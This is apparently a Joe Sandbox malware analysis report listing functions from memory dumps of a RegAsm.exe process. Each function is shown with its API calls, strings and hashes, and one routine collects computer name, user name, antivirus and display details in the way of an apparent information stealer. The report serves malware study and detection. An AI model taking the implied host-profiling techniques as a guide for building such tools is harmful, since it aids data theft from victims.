LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C099675
__Init_thread_footer.LIBCMT ref: 6C099697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C0996E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C099707
__Init_thread_footer.LIBCMT ref: 6C09971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C099773

Part of subcall function 6C0BAB89: EnterCriticalSection.KERNEL32(6C10E370,?,?,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284), ref: 6C0BAB94
Part of subcall function 6C0BAB89: LeaveCriticalSection.KERNEL32(6C10E370,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284,?,?,6C0A56F6), ref: 6C0BABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C0997B7
FreeLibrary.KERNEL32 ref: 6C0997D0
FreeLibrary.KERNEL32 ref: 6C0997EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C099824

Strings

Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C099670
NtMapViewOfSection, xrefs: 6C099701
ntdll.dll, xrefs: 6C0996E3
MapViewOfFileNuma2, xrefs: 6C0997B1

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: 567919fd43af952b877f57b25afeb99c2c0acae086c4ec659ba657a9a281e203
Instruction ID: 7893c163504a2c717b7722e6b9e64a685b4028785ac79fccf766f10cb7b724b0
Opcode Fuzzy Hash: 567919fd43af952b877f57b25afeb99c2c0acae086c4ec659ba657a9a281e203
Instruction Fuzzy Hash: F8418C747002059FDF00CFA9D889B9A7BF5FB49359F10412CED2997740DB30A954EBA6

Function 6C081E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C10E784), ref: 6C081EC1
LeaveCriticalSection.KERNEL32(6C10E784), ref: 6C081EE1
EnterCriticalSection.KERNEL32(6C10E744), ref: 6C081F38
LeaveCriticalSection.KERNEL32(6C10E744), ref: 6C081F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C081F83
LeaveCriticalSection.KERNEL32(6C10E784), ref: 6C081FC0
EnterCriticalSection.KERNEL32(6C10E784), ref: 6C081FE2
LeaveCriticalSection.KERNEL32(6C10E784), ref: 6C081FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C082019

Strings

MOZ_CRASH(), xrefs: 6C082000

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: MOZ_CRASH()
API String ID: 2055633661-2608361144
Opcode ID: 45e73a1f86a072cc4dd479134941607a399a038fbe586b05c5a1eaa9a70e06b8
Instruction ID: 8efb30e03fed174b297c239afe9655fab458e63d07a1a87780cb612b1a7a0057
Opcode Fuzzy Hash: 45e73a1f86a072cc4dd479134941607a399a038fbe586b05c5a1eaa9a70e06b8
Instruction Fuzzy Hash: 0941D171B023258FDF008F69C888BAF7AF5EF49309F004029E965A7741DF7199048BD1

Function 6C0E5FF0 Relevance: 15.1, APIs: 10, Instructions: 76COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6C0E6009
??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C0E6024
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6C08EE51,?), ref: 6C0E6046
OutputDebugStringA.KERNEL32(?,6C08EE51,?), ref: 6C0E6061
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C0E6069
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C0E6073
_dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C0E6082
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C10148E), ref: 6C0E6091
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6C08EE51,00000000,?), ref: 6C0E60BA
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C0E60C4

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
String ID:
API String ID: 3835517998-0
Opcode ID: bc63eb861815082e0e6242d97ae6f17b53d182e0c810c272240ff239f7c2270c
Instruction ID: 9d32f727908748b80ef94ec2e1a883b4bd34ffe11617da9f695b14c603b31db2
Opcode Fuzzy Hash: bc63eb861815082e0e6242d97ae6f17b53d182e0c810c272240ff239f7c2270c
Instruction Fuzzy Hash: 1621D1B1B002189FDB105F64DC08BAE7BF8FF45618F008468E85AA7281CF75A549CFE1

Function 6C0D0000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C094A68), ref: 6C0C945E
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0C9470
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0C9482
Part of subcall function 6C0C9420: __Init_thread_footer.LIBCMT ref: 6C0C949F

GetCurrentThreadId.KERNEL32 ref: 6C0D0039
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0D0041
GetCurrentThreadId.KERNEL32 ref: 6C0D0075
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0D0082
moz_xmalloc.MOZGLUE(00000048), ref: 6C0D0090
free.MOZGLUE(?), ref: 6C0D0104
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0D011B

Strings

[D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C0D005B

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
API String ID: 3012294017-637075127
Opcode ID: 77c64b75272df7f66e0fbeffac2523cc52fc167f1e3b80143d380e5b0cd00540
Instruction ID: 980de54a40540d2c6d2f7f20cf1fc7cc365a1f1148e07fa56fc9b55ac72a2d23
Opcode Fuzzy Hash: 77c64b75272df7f66e0fbeffac2523cc52fc167f1e3b80143d380e5b0cd00540
Instruction Fuzzy Hash: 104179B5A047449FCB10DF64C840A9ABBF0FF49718F51491EED5A93B40DB31B805CB95

Function 6C097E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C097EA7
malloc.MOZGLUE(00000001), ref: 6C097EB3

Part of subcall function 6C09CAB0: EnterCriticalSection.KERNEL32(?), ref: 6C09CB49
Part of subcall function 6C09CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C09CBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C097EC4
mozalloc_abort.MOZGLUE(?), ref: 6C097F19
malloc.MOZGLUE(?), ref: 6C097F36
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C097F4D

Strings

d, xrefs: 6C097F89

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
String ID: d
API String ID: 204725295-2564639436
Opcode ID: 395c60f544fe0a16da3b870fddaf823c4d4a4cec0293c2ff948e740777294409
Instruction ID: 4a6a83379121522ff51a072c05cd27707ee5b6096eb5efe8659e7faed265cae8
Opcode Fuzzy Hash: 395c60f544fe0a16da3b870fddaf823c4d4a4cec0293c2ff948e740777294409
Instruction Fuzzy Hash: 3E31E762E0434897EB009F69DC446FEB7B8EF95208F045229ED5957612FB31E6C8C391

Function 0041F944 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 0041F969

Part of subcall function 0041F504: Replicator::operator[].LIBCMT ref: 0041F587
Part of subcall function 0041F504: DName::operator+=.LIBCMT ref: 0041F58F

DName::operator+.LIBCMT ref: 0041F9C2
DName::DName.LIBCMT ref: 0041FA1A

Strings

..., xrefs: 0041F9FD, 0041FA09
,..., xrefs: 0041F9AE, 0041F9BA
<ellipsis>, xrefs: 0041FA04
void, xrefs: 0041FA12
,<ellipsis>, xrefs: 0041F9B5

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
Instruction ID: a738addbbfcb5581dbeaf62b254c3fbf004fdb1dbbbb6a7a041229699445b56b
Opcode Fuzzy Hash: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
Instruction Fuzzy Hash: 3D217471611249AFCB21DF1CD444AA97BB4EF0534AB14806AE845CB367E738D987CB48

Function 004212DD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 004212E7
DName::DName.LIBCMT ref: 004212F3

Part of subcall function 0041EFBE: DName::doPchar.LIBCMT ref: 0041EFEF

UnDecorator::getScopedName.LIBCMT ref: 00421332
DName::operator+=.LIBCMT ref: 0042133C
DName::operator+=.LIBCMT ref: 0042134B
DName::operator+=.LIBCMT ref: 00421357
DName::operator+=.LIBCMT ref: 00421364

Strings

void, xrefs: 00421343

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
Instruction ID: c2652f7c91e1ef5edc9e2e1e9b8a32b02dad70e76bfe1aa60437c31099f645d5
Opcode Fuzzy Hash: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
Instruction Fuzzy Hash: 75112C75600218BFD704EF68D855BEE7F64AF10309F44009FE416972E2DB38DA85C748

Function 00411563 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
ReleaseDC.USER32(00000000,00000000), ref: 00411596
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
wsprintfA.USER32 ref: 004115BB

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

%dx%d, xrefs: 004115B5

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
String ID: %dx%d
API String ID: 3940144428-2206825331
Opcode ID: b27d7dd64cfe0a637a361d43d9ca9a290f2284dc2a72474dda508b1b2504b9a3
Instruction ID: 170008d2b248a6dac6df5cacbd3238be6a4bc1abd9d224a85ffebcf6f0d8f3fd
Opcode Fuzzy Hash: b27d7dd64cfe0a637a361d43d9ca9a290f2284dc2a72474dda508b1b2504b9a3
Instruction Fuzzy Hash: 59F0C832601320BBEB249BA59C0DD9B7EAEEF467A7F005451F605D2160E6B75E4087A0

Function 6C093E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?,6C093CCC), ref: 6C093EEE
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C093FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040,?,?,?,?,?,6C093CCC), ref: 6C094006
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C0940A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C093CCC), ref: 6C0940AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C093CCC), ref: 6C0940C2
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C094134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C093CCC), ref: 6C094143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C093CCC), ref: 6C094157

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: f5800c74ac0f94cd601ab6d117477366dd29441d61ec6f11846dde4677566a96
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: C0A1AAB1A00215DFDB50CF68C88075AB7F5BF88308F2551A9D919AF742D372E886DFA0

Function 6C082030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,6C0A3F47,?,?,?,6C0A3F47,6C0A1A70,?), ref: 6C08207F
memset.VCRUNTIME140(?,000000E5,6C0A3F47,?,6C0A3F47,6C0A1A70,?), ref: 6C0820DD
VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C0A3F47,6C0A1A70,?), ref: 6C08211A
EnterCriticalSection.KERNEL32(6C10E744,?,6C0A3F47,6C0A1A70,?), ref: 6C082145
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C0A3F47,6C0A1A70,?), ref: 6C0821BA
EnterCriticalSection.KERNEL32(6C10E744,?,6C0A3F47,6C0A1A70,?), ref: 6C0821E0
LeaveCriticalSection.KERNEL32(6C10E744,?,6C0A3F47,6C0A1A70,?), ref: 6C082232

Strings

MOZ_CRASH(), xrefs: 6C08227D
MOZ_RELEASE_ASSERT(node->mArena == this), xrefs: 6C082253, 6C082268

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
API String ID: 889484744-884734703
Opcode ID: 7daab9544f0c021fef047638eab091ba0d91fa3d94ab1bf60c912340fd7837f6
Instruction ID: 15220bc3d4500ba3068376123d24013b4a6c222d2882bf7ba964b79237ac2639
Opcode Fuzzy Hash: 7daab9544f0c021fef047638eab091ba0d91fa3d94ab1bf60c912340fd7837f6
Instruction Fuzzy Hash: 6461E632F022168FCF04CA69C989B6E77F1AF95718F258139E625A7A94DB709900CB91

Function 6C0848E0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(8E8DFFFF,?,6C0C483A,?), ref: 6C084ACB
memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6C0C483A,?), ref: 6C084AE0
moz_xmalloc.MOZGLUE(FFFE15BF,?,6C0C483A,?), ref: 6C084A82

Part of subcall function 6C09CA10: mozalloc_abort.MOZGLUE(?), ref: 6C09CAA2

memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6C0C483A,?), ref: 6C084A97
moz_xmalloc.MOZGLUE(15D4E801,?,6C0C483A,?), ref: 6C084A35

Part of subcall function 6C09CA10: malloc.MOZGLUE(?), ref: 6C09CA26

memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6C0C483A,?), ref: 6C084A4A
moz_xmalloc.MOZGLUE(15D4E824,?,6C0C483A,?), ref: 6C084AF4
moz_xmalloc.MOZGLUE(FFFE15E2,?,6C0C483A,?), ref: 6C084B10
moz_xmalloc.MOZGLUE(8E8E0022,?,6C0C483A,?), ref: 6C084B2C

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
String ID:
API String ID: 4251373892-0
Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction ID: 3999ac6ea3b225729ba53a157d5aa35f66abbdc4c3223e5eb57457867b1d4315
Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction Fuzzy Hash: 68716AB19057069FCB14CFA8C490AAAB7F9FF19308B50863ED15A9BB41E731F555CB80

Function 6C0D9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D8273), ref: 6C0D9D65
free.MOZGLUE(6C0D8273,?), ref: 6C0D9D7C
free.MOZGLUE(?,?), ref: 6C0D9D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0D9E0F
free.MOZGLUE(6C0D946B,?,?), ref: 6C0D9E24
free.MOZGLUE(?,?,?), ref: 6C0D9E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C0D9EC8
free.MOZGLUE(6C0D946B,?,?,?), ref: 6C0D9EDF
free.MOZGLUE(?,?,?,?), ref: 6C0D9EF5

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: c6f4a1c4d5c69b89866040cd5095829645f2ec762b74a6c9970398e3c1d0e258
Instruction ID: 27fd7b5d4e987bba8057b63492309ab016eb77afb4b0d1288ecb14370b3e1eb6
Opcode Fuzzy Hash: c6f4a1c4d5c69b89866040cd5095829645f2ec762b74a6c9970398e3c1d0e258
Instruction Fuzzy Hash: 9E71AE74909B419FC716CF98C49065BF3F4FF99324B458619E88A5BB02EB30F885CB81

Function 6C0DDDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C0DDDCF

Part of subcall function 6C0BFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0BFA4B

Part of subcall function 6C0D90E0: free.MOZGLUE(?,00000000,?,?,6C0DDEDB), ref: 6C0D90FF
Part of subcall function 6C0D90E0: free.MOZGLUE(?,00000000,?,?,6C0DDEDB), ref: 6C0D9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0DDE0D
free.MOZGLUE(00000000), ref: 6C0DDE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0DDE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0DDEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0DDEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C0CDEFD,?,6C094A68), ref: 6C0DDF32

Part of subcall function 6C0DDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C0DDB86
Part of subcall function 6C0DDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C0DDC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C0CDEFD,?,6C094A68), ref: 6C0DDF65
free.MOZGLUE(?), ref: 6C0DDF80

Part of subcall function 6C0A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0A5EDB
Part of subcall function 6C0A5E90: memset.VCRUNTIME140(6C0E7765,000000E5,55CCCCCC), ref: 6C0A5F27
